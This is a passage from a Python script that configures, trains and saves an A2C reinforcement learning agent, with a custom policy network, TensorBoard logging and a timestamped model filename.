59 |     print("[*] Creating A2C model ...")  
60 |     policy_kwargs = dict(activation_fn=th.nn.ReLU,net_arch=[dict(pi=[128,128,128], vf=[128,128,128])])
61 | 
62 |     learning_rate = 0.0005
63 |     gamma = 0.95
64 |     model = A2C(CustomPolicy, env, verbose=1,tensorboard_log="./tensorboard_log/", learning_rate=learning_rate, gamma=gamma)   
65 |     print("[*] Start Agent learning ...")
66 | 
67 | 
68 |     log_title = time.strftime('%Y.%m.%d', time.localtime(time.time())) + "-" + test_suite_name +  "-" + str(timesteps) + "-A2C-learning-" + str(learning_rate) + "-gamma-" + str(gamma) + "O"
69 | 
70 |     model.learn(total_timesteps=timesteps , tb_log_name=log_title)
71 |     
72 |     model_name = "models/" + log_title + "-" + str(uuid.uuid4()) + "-model.pkl"
73 | 
74 |     # save trained model
75 |     model.save(model_name)
76 | 
77 |     # env.show_graph()
78 | 
79 |     del model
80 | 
81 | if __name__ == '__main__':
82 |     main(sys.argv)
83 | 
84 | 


--------------------------------------------------------------------------------